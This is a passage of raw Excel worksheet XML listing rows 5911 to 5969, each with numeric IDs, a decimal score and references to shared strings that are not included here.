      <c r="F5911" t="s">
        <v>10120</v>
      </c>
      <c r="G5911" t="s">
        <v>11694</v>
      </c>
      <c r="H5911" t="s">
        <v>11695</v>
      </c>
    </row>
    <row r="5912" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5912" s="1">
        <v>5910</v>
      </c>
      <c r="B5912">
        <v>757</v>
      </c>
      <c r="C5912">
        <v>757</v>
      </c>
      <c r="D5912">
        <v>3</v>
      </c>
      <c r="E5912">
        <v>0.55970001220703125</v>
      </c>
      <c r="F5912" t="s">
        <v>10120</v>
      </c>
      <c r="G5912" t="s">
        <v>11696</v>
      </c>
      <c r="H5912" t="s">
        <v>11697</v>
      </c>
    </row>
    <row r="5913" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5913" s="1">
        <v>5911</v>
      </c>
      <c r="B5913">
        <v>3638</v>
      </c>
      <c r="C5913">
        <v>3638</v>
      </c>
      <c r="D5913">
        <v>3</v>
      </c>
      <c r="E5913">
        <v>0.5372999906539917</v>
      </c>
      <c r="F5913" t="s">
        <v>10120</v>
      </c>
      <c r="G5913" t="s">
        <v>11698</v>
      </c>
      <c r="H5913" t="s">
        <v>11699</v>
      </c>
    </row>
    <row r="5914" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5914" s="1">
        <v>5912</v>
      </c>
      <c r="B5914">
        <v>771</v>
      </c>
      <c r="C5914">
        <v>771</v>
      </c>
      <c r="D5914">
        <v>3</v>
      </c>
      <c r="E5914">
        <v>0.9122999906539917</v>
      </c>
      <c r="F5914" t="s">
        <v>10120</v>
      </c>
      <c r="G5914" t="s">
        <v>11700</v>
      </c>
      <c r="H5914" t="s">
        <v>11701</v>
      </c>
    </row>
    <row r="5915" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5915" s="1">
        <v>5913</v>
      </c>
      <c r="B5915">
        <v>3962</v>
      </c>
      <c r="C5915">
        <v>3962</v>
      </c>
      <c r="D5915">
        <v>3</v>
      </c>
      <c r="E5915">
        <v>0.78949999809265137</v>
      </c>
      <c r="F5915" t="s">
        <v>10120</v>
      </c>
      <c r="G5915" t="s">
        <v>11702</v>
      </c>
      <c r="H5915" t="s">
        <v>11703</v>
      </c>
    </row>
    <row r="5916" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5916" s="1">
        <v>5914</v>
      </c>
      <c r="B5916">
        <v>2778</v>
      </c>
      <c r="C5916">
        <v>2778</v>
      </c>
      <c r="D5916">
        <v>3</v>
      </c>
      <c r="E5916">
        <v>0.76130002737045288</v>
      </c>
      <c r="F5916" t="s">
        <v>10120</v>
      </c>
      <c r="G5916" t="s">
        <v>11704</v>
      </c>
      <c r="H5916" t="s">
        <v>11705</v>
      </c>
    </row>
    <row r="5917" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5917" s="1">
        <v>5915</v>
      </c>
      <c r="B5917">
        <v>2768</v>
      </c>
      <c r="C5917">
        <v>2768</v>
      </c>
      <c r="D5917">
        <v>3</v>
      </c>
      <c r="E5917">
        <v>0.5242999792098999</v>
      </c>
      <c r="F5917" t="s">
        <v>10120</v>
      </c>
      <c r="G5917" t="s">
        <v>11706</v>
      </c>
      <c r="H5917" t="s">
        <v>11707</v>
      </c>
    </row>
    <row r="5918" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5918" s="1">
        <v>5916</v>
      </c>
      <c r="B5918">
        <v>2059</v>
      </c>
      <c r="C5918">
        <v>2059</v>
      </c>
      <c r="D5918">
        <v>3</v>
      </c>
      <c r="E5918">
        <v>0.56919997930526733</v>
      </c>
      <c r="F5918" t="s">
        <v>10120</v>
      </c>
      <c r="G5918" t="s">
        <v>11708</v>
      </c>
      <c r="H5918" t="s">
        <v>11709</v>
      </c>
    </row>
    <row r="5919" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5919" s="1">
        <v>5917</v>
      </c>
      <c r="B5919">
        <v>2065</v>
      </c>
      <c r="C5919">
        <v>2065</v>
      </c>
      <c r="D5919">
        <v>3</v>
      </c>
      <c r="E5919">
        <v>0.64069998264312744</v>
      </c>
      <c r="F5919" t="s">
        <v>10120</v>
      </c>
      <c r="G5919" t="s">
        <v>11710</v>
      </c>
      <c r="H5919" t="s">
        <v>11711</v>
      </c>
    </row>
    <row r="5920" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5920" s="1">
        <v>5918</v>
      </c>
      <c r="B5920">
        <v>1487</v>
      </c>
      <c r="C5920">
        <v>1487</v>
      </c>
      <c r="D5920">
        <v>3</v>
      </c>
      <c r="E5920">
        <v>0.99720001220703125</v>
      </c>
      <c r="F5920" t="s">
        <v>10120</v>
      </c>
      <c r="G5920" t="s">
        <v>11712</v>
      </c>
      <c r="H5920" t="s">
        <v>11713</v>
      </c>
    </row>
    <row r="5921" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5921" s="1">
        <v>5919</v>
      </c>
      <c r="B5921">
        <v>2068</v>
      </c>
      <c r="C5921">
        <v>2068</v>
      </c>
      <c r="D5921">
        <v>3</v>
      </c>
      <c r="E5921">
        <v>0.44130000472068792</v>
      </c>
      <c r="F5921" t="s">
        <v>10120</v>
      </c>
      <c r="G5921" t="s">
        <v>11714</v>
      </c>
      <c r="H5921" t="s">
        <v>11715</v>
      </c>
    </row>
    <row r="5922" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5922" s="1">
        <v>5920</v>
      </c>
      <c r="B5922">
        <v>1483</v>
      </c>
      <c r="C5922">
        <v>1483</v>
      </c>
      <c r="D5922">
        <v>3</v>
      </c>
      <c r="E5922">
        <v>0.55650001764297485</v>
      </c>
      <c r="F5922" t="s">
        <v>10120</v>
      </c>
      <c r="G5922" t="s">
        <v>11716</v>
      </c>
      <c r="H5922" t="s">
        <v>11717</v>
      </c>
    </row>
    <row r="5923" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5923" s="1">
        <v>5921</v>
      </c>
      <c r="B5923">
        <v>1478</v>
      </c>
      <c r="C5923">
        <v>1478</v>
      </c>
      <c r="D5923">
        <v>3</v>
      </c>
      <c r="E5923">
        <v>0.4934999942779541</v>
      </c>
      <c r="F5923" t="s">
        <v>10120</v>
      </c>
      <c r="G5923" t="s">
        <v>11718</v>
      </c>
      <c r="H5923" t="s">
        <v>11719</v>
      </c>
    </row>
    <row r="5924" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5924" s="1">
        <v>5922</v>
      </c>
      <c r="B5924">
        <v>2074</v>
      </c>
      <c r="C5924">
        <v>2074</v>
      </c>
      <c r="D5924">
        <v>3</v>
      </c>
      <c r="E5924">
        <v>0.85210001468658447</v>
      </c>
      <c r="F5924" t="s">
        <v>10120</v>
      </c>
      <c r="G5924" t="s">
        <v>11720</v>
      </c>
      <c r="H5924" t="s">
        <v>11721</v>
      </c>
    </row>
    <row r="5925" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5925" s="1">
        <v>5923</v>
      </c>
      <c r="B5925">
        <v>2081</v>
      </c>
      <c r="C5925">
        <v>2081</v>
      </c>
      <c r="D5925">
        <v>3</v>
      </c>
      <c r="E5925">
        <v>0.98400002717971802</v>
      </c>
      <c r="F5925" t="s">
        <v>10120</v>
      </c>
      <c r="G5925" t="s">
        <v>11722</v>
      </c>
      <c r="H5925" t="s">
        <v>11723</v>
      </c>
    </row>
    <row r="5926" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5926" s="1">
        <v>5924</v>
      </c>
      <c r="B5926">
        <v>2082</v>
      </c>
      <c r="C5926">
        <v>2082</v>
      </c>
      <c r="D5926">
        <v>3</v>
      </c>
      <c r="E5926">
        <v>0.99819999933242798</v>
      </c>
      <c r="F5926" t="s">
        <v>10120</v>
      </c>
      <c r="G5926" t="s">
        <v>11724</v>
      </c>
      <c r="H5926" t="s">
        <v>11725</v>
      </c>
    </row>
    <row r="5927" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5927" s="1">
        <v>5925</v>
      </c>
      <c r="B5927">
        <v>2102</v>
      </c>
      <c r="C5927">
        <v>2102</v>
      </c>
      <c r="D5927">
        <v>3</v>
      </c>
      <c r="E5927">
        <v>0.84530001878738403</v>
      </c>
      <c r="F5927" t="s">
        <v>10120</v>
      </c>
      <c r="G5927" t="s">
        <v>11726</v>
      </c>
      <c r="H5927" t="s">
        <v>11727</v>
      </c>
    </row>
    <row r="5928" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5928" s="1">
        <v>5926</v>
      </c>
      <c r="B5928">
        <v>2103</v>
      </c>
      <c r="C5928">
        <v>2103</v>
      </c>
      <c r="D5928">
        <v>3</v>
      </c>
      <c r="E5928">
        <v>0.98290002346038818</v>
      </c>
      <c r="F5928" t="s">
        <v>10120</v>
      </c>
      <c r="G5928" t="s">
        <v>11728</v>
      </c>
      <c r="H5928" t="s">
        <v>11729</v>
      </c>
    </row>
    <row r="5929" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5929" s="1">
        <v>5927</v>
      </c>
      <c r="B5929">
        <v>1475</v>
      </c>
      <c r="C5929">
        <v>1475</v>
      </c>
      <c r="D5929">
        <v>3</v>
      </c>
      <c r="E5929">
        <v>0.52410000562667847</v>
      </c>
      <c r="F5929" t="s">
        <v>10120</v>
      </c>
      <c r="G5929" t="s">
        <v>11730</v>
      </c>
      <c r="H5929" t="s">
        <v>11731</v>
      </c>
    </row>
    <row r="5930" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5930" s="1">
        <v>5928</v>
      </c>
      <c r="B5930">
        <v>2108</v>
      </c>
      <c r="C5930">
        <v>2108</v>
      </c>
      <c r="D5930">
        <v>3</v>
      </c>
      <c r="E5930">
        <v>0.5755000114440918</v>
      </c>
      <c r="F5930" t="s">
        <v>10120</v>
      </c>
      <c r="G5930" t="s">
        <v>11732</v>
      </c>
      <c r="H5930" t="s">
        <v>11733</v>
      </c>
    </row>
    <row r="5931" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5931" s="1">
        <v>5929</v>
      </c>
      <c r="B5931">
        <v>1474</v>
      </c>
      <c r="C5931">
        <v>1474</v>
      </c>
      <c r="D5931">
        <v>3</v>
      </c>
      <c r="E5931">
        <v>0.69709998369216919</v>
      </c>
      <c r="F5931" t="s">
        <v>10120</v>
      </c>
      <c r="G5931" t="s">
        <v>11734</v>
      </c>
      <c r="H5931" t="s">
        <v>11735</v>
      </c>
    </row>
    <row r="5932" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5932" s="1">
        <v>5930</v>
      </c>
      <c r="B5932">
        <v>2112</v>
      </c>
      <c r="C5932">
        <v>2112</v>
      </c>
      <c r="D5932">
        <v>3</v>
      </c>
      <c r="E5932">
        <v>0.67199999094009399</v>
      </c>
      <c r="F5932" t="s">
        <v>10120</v>
      </c>
      <c r="G5932" t="s">
        <v>11736</v>
      </c>
      <c r="H5932" t="s">
        <v>11737</v>
      </c>
    </row>
    <row r="5933" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5933" s="1">
        <v>5931</v>
      </c>
      <c r="B5933">
        <v>2122</v>
      </c>
      <c r="C5933">
        <v>2122</v>
      </c>
      <c r="D5933">
        <v>3</v>
      </c>
      <c r="E5933">
        <v>0.65810000896453857</v>
      </c>
      <c r="F5933" t="s">
        <v>10120</v>
      </c>
      <c r="G5933" t="s">
        <v>11738</v>
      </c>
      <c r="H5933" t="s">
        <v>11739</v>
      </c>
    </row>
    <row r="5934" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5934" s="1">
        <v>5932</v>
      </c>
      <c r="B5934">
        <v>2123</v>
      </c>
      <c r="C5934">
        <v>2123</v>
      </c>
      <c r="D5934">
        <v>3</v>
      </c>
      <c r="E5934">
        <v>0.65780001878738403</v>
      </c>
      <c r="F5934" t="s">
        <v>10120</v>
      </c>
      <c r="G5934" t="s">
        <v>11740</v>
      </c>
      <c r="H5934" t="s">
        <v>11739</v>
      </c>
    </row>
    <row r="5935" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5935" s="1">
        <v>5933</v>
      </c>
      <c r="B5935">
        <v>1495</v>
      </c>
      <c r="C5935">
        <v>1495</v>
      </c>
      <c r="D5935">
        <v>3</v>
      </c>
      <c r="E5935">
        <v>0.74360001087188721</v>
      </c>
      <c r="F5935" t="s">
        <v>10120</v>
      </c>
      <c r="G5935" t="s">
        <v>11741</v>
      </c>
      <c r="H5935" t="s">
        <v>11742</v>
      </c>
    </row>
    <row r="5936" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5936" s="1">
        <v>5934</v>
      </c>
      <c r="B5936">
        <v>2132</v>
      </c>
      <c r="C5936">
        <v>2132</v>
      </c>
      <c r="D5936">
        <v>3</v>
      </c>
      <c r="E5936">
        <v>0.9968000054359436</v>
      </c>
      <c r="F5936" t="s">
        <v>10120</v>
      </c>
      <c r="G5936" t="s">
        <v>11743</v>
      </c>
      <c r="H5936" t="s">
        <v>11744</v>
      </c>
    </row>
    <row r="5937" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5937" s="1">
        <v>5935</v>
      </c>
      <c r="B5937">
        <v>2054</v>
      </c>
      <c r="C5937">
        <v>2054</v>
      </c>
      <c r="D5937">
        <v>3</v>
      </c>
      <c r="E5937">
        <v>0.99250000715255737</v>
      </c>
      <c r="F5937" t="s">
        <v>10120</v>
      </c>
      <c r="G5937" t="s">
        <v>11745</v>
      </c>
      <c r="H5937" t="s">
        <v>11746</v>
      </c>
    </row>
    <row r="5938" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5938" s="1">
        <v>5936</v>
      </c>
      <c r="B5938">
        <v>2049</v>
      </c>
      <c r="C5938">
        <v>2049</v>
      </c>
      <c r="D5938">
        <v>3</v>
      </c>
      <c r="E5938">
        <v>0.29820001125335688</v>
      </c>
      <c r="F5938" t="s">
        <v>10120</v>
      </c>
      <c r="G5938" t="s">
        <v>11747</v>
      </c>
      <c r="H5938" t="s">
        <v>11748</v>
      </c>
    </row>
    <row r="5939" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5939" s="1">
        <v>5937</v>
      </c>
      <c r="B5939">
        <v>2020</v>
      </c>
      <c r="C5939">
        <v>2020</v>
      </c>
      <c r="D5939">
        <v>3</v>
      </c>
      <c r="E5939">
        <v>0.66490000486373901</v>
      </c>
      <c r="F5939" t="s">
        <v>10120</v>
      </c>
      <c r="G5939" t="s">
        <v>11749</v>
      </c>
      <c r="H5939" t="s">
        <v>11750</v>
      </c>
    </row>
    <row r="5940" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5940" s="1">
        <v>5938</v>
      </c>
      <c r="B5940">
        <v>2023</v>
      </c>
      <c r="C5940">
        <v>2023</v>
      </c>
      <c r="D5940">
        <v>3</v>
      </c>
      <c r="E5940">
        <v>0.9976000189781189</v>
      </c>
      <c r="F5940" t="s">
        <v>10120</v>
      </c>
      <c r="G5940" t="s">
        <v>11751</v>
      </c>
      <c r="H5940" t="s">
        <v>11752</v>
      </c>
    </row>
    <row r="5941" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5941" s="1">
        <v>5939</v>
      </c>
      <c r="B5941">
        <v>2025</v>
      </c>
      <c r="C5941">
        <v>2025</v>
      </c>
      <c r="D5941">
        <v>3</v>
      </c>
      <c r="E5941">
        <v>0.89090001583099365</v>
      </c>
      <c r="F5941" t="s">
        <v>10120</v>
      </c>
      <c r="G5941" t="s">
        <v>11753</v>
      </c>
      <c r="H5941" t="s">
        <v>11754</v>
      </c>
    </row>
    <row r="5942" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5942" s="1">
        <v>5940</v>
      </c>
      <c r="B5942">
        <v>1540</v>
      </c>
      <c r="C5942">
        <v>1540</v>
      </c>
      <c r="D5942">
        <v>3</v>
      </c>
      <c r="E5942">
        <v>0.56319999694824219</v>
      </c>
      <c r="F5942" t="s">
        <v>10120</v>
      </c>
      <c r="G5942" t="s">
        <v>11755</v>
      </c>
      <c r="H5942" t="s">
        <v>11756</v>
      </c>
    </row>
    <row r="5943" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5943" s="1">
        <v>5941</v>
      </c>
      <c r="B5943">
        <v>1535</v>
      </c>
      <c r="C5943">
        <v>1535</v>
      </c>
      <c r="D5943">
        <v>3</v>
      </c>
      <c r="E5943">
        <v>0.51709997653961182</v>
      </c>
      <c r="F5943" t="s">
        <v>10120</v>
      </c>
      <c r="G5943" t="s">
        <v>11757</v>
      </c>
      <c r="H5943" t="s">
        <v>11758</v>
      </c>
    </row>
    <row r="5944" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5944" s="1">
        <v>5942</v>
      </c>
      <c r="B5944">
        <v>2034</v>
      </c>
      <c r="C5944">
        <v>2034</v>
      </c>
      <c r="D5944">
        <v>3</v>
      </c>
      <c r="E5944">
        <v>0.68550002574920654</v>
      </c>
      <c r="F5944" t="s">
        <v>10120</v>
      </c>
      <c r="G5944" t="s">
        <v>11759</v>
      </c>
      <c r="H5944" t="s">
        <v>11760</v>
      </c>
    </row>
    <row r="5945" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5945" s="1">
        <v>5943</v>
      </c>
      <c r="B5945">
        <v>1532</v>
      </c>
      <c r="C5945">
        <v>1532</v>
      </c>
      <c r="D5945">
        <v>3</v>
      </c>
      <c r="E5945">
        <v>0.52069997787475586</v>
      </c>
      <c r="F5945" t="s">
        <v>10120</v>
      </c>
      <c r="G5945" t="s">
        <v>11761</v>
      </c>
      <c r="H5945" t="s">
        <v>11762</v>
      </c>
    </row>
    <row r="5946" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5946" s="1">
        <v>5944</v>
      </c>
      <c r="B5946">
        <v>2036</v>
      </c>
      <c r="C5946">
        <v>2036</v>
      </c>
      <c r="D5946">
        <v>3</v>
      </c>
      <c r="E5946">
        <v>0.44089999794960022</v>
      </c>
      <c r="F5946" t="s">
        <v>10120</v>
      </c>
      <c r="G5946" t="s">
        <v>11763</v>
      </c>
      <c r="H5946" t="s">
        <v>11764</v>
      </c>
    </row>
    <row r="5947" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5947" s="1">
        <v>5945</v>
      </c>
      <c r="B5947">
        <v>2037</v>
      </c>
      <c r="C5947">
        <v>2037</v>
      </c>
      <c r="D5947">
        <v>3</v>
      </c>
      <c r="E5947">
        <v>0.53890001773834229</v>
      </c>
      <c r="F5947" t="s">
        <v>10120</v>
      </c>
      <c r="G5947" t="s">
        <v>11765</v>
      </c>
      <c r="H5947" t="s">
        <v>11766</v>
      </c>
    </row>
    <row r="5948" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5948" s="1">
        <v>5946</v>
      </c>
      <c r="B5948">
        <v>2038</v>
      </c>
      <c r="C5948">
        <v>2038</v>
      </c>
      <c r="D5948">
        <v>3</v>
      </c>
      <c r="E5948">
        <v>0.49660000205039978</v>
      </c>
      <c r="F5948" t="s">
        <v>10120</v>
      </c>
      <c r="G5948" t="s">
        <v>11767</v>
      </c>
      <c r="H5948" t="s">
        <v>11768</v>
      </c>
    </row>
    <row r="5949" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5949" s="1">
        <v>5947</v>
      </c>
      <c r="B5949">
        <v>2040</v>
      </c>
      <c r="C5949">
        <v>2040</v>
      </c>
      <c r="D5949">
        <v>3</v>
      </c>
      <c r="E5949">
        <v>0.99790000915527344</v>
      </c>
      <c r="F5949" t="s">
        <v>10120</v>
      </c>
      <c r="G5949" t="s">
        <v>11769</v>
      </c>
      <c r="H5949" t="s">
        <v>11770</v>
      </c>
    </row>
    <row r="5950" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5950" s="1">
        <v>5948</v>
      </c>
      <c r="B5950">
        <v>1524</v>
      </c>
      <c r="C5950">
        <v>1524</v>
      </c>
      <c r="D5950">
        <v>3</v>
      </c>
      <c r="E5950">
        <v>0.94429999589920044</v>
      </c>
      <c r="F5950" t="s">
        <v>10120</v>
      </c>
      <c r="G5950" t="s">
        <v>11771</v>
      </c>
      <c r="H5950" t="s">
        <v>11772</v>
      </c>
    </row>
    <row r="5951" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5951" s="1">
        <v>5949</v>
      </c>
      <c r="B5951">
        <v>2042</v>
      </c>
      <c r="C5951">
        <v>2042</v>
      </c>
      <c r="D5951">
        <v>3</v>
      </c>
      <c r="E5951">
        <v>0.99589997529983521</v>
      </c>
      <c r="F5951" t="s">
        <v>10120</v>
      </c>
      <c r="G5951" t="s">
        <v>11773</v>
      </c>
      <c r="H5951" t="s">
        <v>11774</v>
      </c>
    </row>
    <row r="5952" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5952" s="1">
        <v>5950</v>
      </c>
      <c r="B5952">
        <v>1509</v>
      </c>
      <c r="C5952">
        <v>1509</v>
      </c>
      <c r="D5952">
        <v>3</v>
      </c>
      <c r="E5952">
        <v>0.72269999980926514</v>
      </c>
      <c r="F5952" t="s">
        <v>10120</v>
      </c>
      <c r="G5952" t="s">
        <v>11775</v>
      </c>
      <c r="H5952" t="s">
        <v>11776</v>
      </c>
    </row>
    <row r="5953" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5953" s="1">
        <v>5951</v>
      </c>
      <c r="B5953">
        <v>1503</v>
      </c>
      <c r="C5953">
        <v>1503</v>
      </c>
      <c r="D5953">
        <v>3</v>
      </c>
      <c r="E5953">
        <v>0.99690002202987671</v>
      </c>
      <c r="F5953" t="s">
        <v>10120</v>
      </c>
      <c r="G5953" t="s">
        <v>11777</v>
      </c>
      <c r="H5953" t="s">
        <v>11778</v>
      </c>
    </row>
    <row r="5954" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5954" s="1">
        <v>5952</v>
      </c>
      <c r="B5954">
        <v>1502</v>
      </c>
      <c r="C5954">
        <v>1502</v>
      </c>
      <c r="D5954">
        <v>3</v>
      </c>
      <c r="E5954">
        <v>0.42989999055862432</v>
      </c>
      <c r="F5954" t="s">
        <v>10120</v>
      </c>
      <c r="G5954" t="s">
        <v>11779</v>
      </c>
      <c r="H5954" t="s">
        <v>11780</v>
      </c>
    </row>
    <row r="5955" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5955" s="1">
        <v>5953</v>
      </c>
      <c r="B5955">
        <v>2043</v>
      </c>
      <c r="C5955">
        <v>2043</v>
      </c>
      <c r="D5955">
        <v>3</v>
      </c>
      <c r="E5955">
        <v>0.52079999446868896</v>
      </c>
      <c r="F5955" t="s">
        <v>10120</v>
      </c>
      <c r="G5955" t="s">
        <v>11781</v>
      </c>
      <c r="H5955" t="s">
        <v>11782</v>
      </c>
    </row>
    <row r="5956" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5956" s="1">
        <v>5954</v>
      </c>
      <c r="B5956">
        <v>1501</v>
      </c>
      <c r="C5956">
        <v>1501</v>
      </c>
      <c r="D5956">
        <v>3</v>
      </c>
      <c r="E5956">
        <v>0.59390002489089966</v>
      </c>
      <c r="F5956" t="s">
        <v>10120</v>
      </c>
      <c r="G5956" t="s">
        <v>11783</v>
      </c>
      <c r="H5956" t="s">
        <v>11784</v>
      </c>
    </row>
    <row r="5957" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5957" s="1">
        <v>5955</v>
      </c>
      <c r="B5957">
        <v>1541</v>
      </c>
      <c r="C5957">
        <v>1541</v>
      </c>
      <c r="D5957">
        <v>3</v>
      </c>
      <c r="E5957">
        <v>0.41260001063346857</v>
      </c>
      <c r="F5957" t="s">
        <v>10120</v>
      </c>
      <c r="G5957" t="s">
        <v>11785</v>
      </c>
      <c r="H5957" t="s">
        <v>11786</v>
      </c>
    </row>
    <row r="5958" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5958" s="1">
        <v>5956</v>
      </c>
      <c r="B5958">
        <v>2135</v>
      </c>
      <c r="C5958">
        <v>2135</v>
      </c>
      <c r="D5958">
        <v>3</v>
      </c>
      <c r="E5958">
        <v>0.98559999465942383</v>
      </c>
      <c r="F5958" t="s">
        <v>10120</v>
      </c>
      <c r="G5958" t="s">
        <v>11787</v>
      </c>
      <c r="H5958" t="s">
        <v>11788</v>
      </c>
    </row>
    <row r="5959" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5959" s="1">
        <v>5957</v>
      </c>
      <c r="B5959">
        <v>1467</v>
      </c>
      <c r="C5959">
        <v>1467</v>
      </c>
      <c r="D5959">
        <v>3</v>
      </c>
      <c r="E5959">
        <v>0.99330002069473267</v>
      </c>
      <c r="F5959" t="s">
        <v>10120</v>
      </c>
      <c r="G5959" t="s">
        <v>11789</v>
      </c>
      <c r="H5959" t="s">
        <v>11790</v>
      </c>
    </row>
    <row r="5960" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5960" s="1">
        <v>5958</v>
      </c>
      <c r="B5960">
        <v>1434</v>
      </c>
      <c r="C5960">
        <v>1434</v>
      </c>
      <c r="D5960">
        <v>3</v>
      </c>
      <c r="E5960">
        <v>0.81410002708435059</v>
      </c>
      <c r="F5960" t="s">
        <v>10120</v>
      </c>
      <c r="G5960" t="s">
        <v>11791</v>
      </c>
      <c r="H5960" t="s">
        <v>11792</v>
      </c>
    </row>
    <row r="5961" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5961" s="1">
        <v>5959</v>
      </c>
      <c r="B5961">
        <v>2177</v>
      </c>
      <c r="C5961">
        <v>2177</v>
      </c>
      <c r="D5961">
        <v>3</v>
      </c>
      <c r="E5961">
        <v>0.53530001640319824</v>
      </c>
      <c r="F5961" t="s">
        <v>10120</v>
      </c>
      <c r="G5961" t="s">
        <v>11793</v>
      </c>
      <c r="H5961" t="s">
        <v>11794</v>
      </c>
    </row>
    <row r="5962" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5962" s="1">
        <v>5960</v>
      </c>
      <c r="B5962">
        <v>2182</v>
      </c>
      <c r="C5962">
        <v>2182</v>
      </c>
      <c r="D5962">
        <v>3</v>
      </c>
      <c r="E5962">
        <v>0.67320001125335693</v>
      </c>
      <c r="F5962" t="s">
        <v>10120</v>
      </c>
      <c r="G5962" t="s">
        <v>11795</v>
      </c>
      <c r="H5962" t="s">
        <v>11796</v>
      </c>
    </row>
    <row r="5963" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5963" s="1">
        <v>5961</v>
      </c>
      <c r="B5963">
        <v>2184</v>
      </c>
      <c r="C5963">
        <v>2184</v>
      </c>
      <c r="D5963">
        <v>3</v>
      </c>
      <c r="E5963">
        <v>0.99889999628067017</v>
      </c>
      <c r="F5963" t="s">
        <v>10120</v>
      </c>
      <c r="G5963" t="s">
        <v>11797</v>
      </c>
      <c r="H5963" t="s">
        <v>10263</v>
      </c>
    </row>
    <row r="5964" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5964" s="1">
        <v>5962</v>
      </c>
      <c r="B5964">
        <v>2186</v>
      </c>
      <c r="C5964">
        <v>2186</v>
      </c>
      <c r="D5964">
        <v>3</v>
      </c>
      <c r="E5964">
        <v>0.49309998750686651</v>
      </c>
      <c r="F5964" t="s">
        <v>10120</v>
      </c>
      <c r="G5964" t="s">
        <v>11798</v>
      </c>
      <c r="H5964" t="s">
        <v>11799</v>
      </c>
    </row>
    <row r="5965" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5965" s="1">
        <v>5963</v>
      </c>
      <c r="B5965">
        <v>2188</v>
      </c>
      <c r="C5965">
        <v>2188</v>
      </c>
      <c r="D5965">
        <v>3</v>
      </c>
      <c r="E5965">
        <v>0.72200000286102295</v>
      </c>
      <c r="F5965" t="s">
        <v>10120</v>
      </c>
      <c r="G5965" t="s">
        <v>11800</v>
      </c>
      <c r="H5965" t="s">
        <v>11801</v>
      </c>
    </row>
    <row r="5966" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5966" s="1">
        <v>5964</v>
      </c>
      <c r="B5966">
        <v>1427</v>
      </c>
      <c r="C5966">
        <v>1427</v>
      </c>
      <c r="D5966">
        <v>3</v>
      </c>
      <c r="E5966">
        <v>0.79400002956390381</v>
      </c>
      <c r="F5966" t="s">
        <v>10120</v>
      </c>
      <c r="G5966" t="s">
        <v>11802</v>
      </c>
      <c r="H5966" t="s">
        <v>11803</v>
      </c>
    </row>
    <row r="5967" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5967" s="1">
        <v>5965</v>
      </c>
      <c r="B5967">
        <v>2192</v>
      </c>
      <c r="C5967">
        <v>2192</v>
      </c>
      <c r="D5967">
        <v>3</v>
      </c>
      <c r="E5967">
        <v>0.99949997663497925</v>
      </c>
      <c r="F5967" t="s">
        <v>10120</v>
      </c>
      <c r="G5967" t="s">
        <v>11804</v>
      </c>
      <c r="H5967" t="s">
        <v>11805</v>
      </c>
    </row>
    <row r="5968" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5968" s="1">
        <v>5966</v>
      </c>
      <c r="B5968">
        <v>2194</v>
      </c>
      <c r="C5968">
        <v>2194</v>
      </c>
      <c r="D5968">
        <v>3</v>
      </c>
      <c r="E5968">
        <v>0.99360001087188721</v>
      </c>
      <c r="F5968" t="s">
        <v>10120</v>
      </c>
      <c r="G5968" t="s">
        <v>11806</v>
      </c>
      <c r="H5968" t="s">
        <v>11807</v>
      </c>
    </row>
    <row r="5969" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5969" s="1">
        <v>5967</v>
      </c>
      <c r="B5969">
        <v>2195</v>
      </c>
      <c r="C5969">
        <v>2195</v>
      </c>
      <c r="D5969">
        <v>3</v>
      </c>
      <c r="E5969">
        <v>0.74239999055862427</v>
      </c>
      <c r="F5969" t="s">
        <v>10120</v>
      </c>
      <c r="G5969" t="s">
        <v>11808</v>
      </c>
      <c r="H5969" t="s">
        <v>11809</v>
      </c>
    </row>
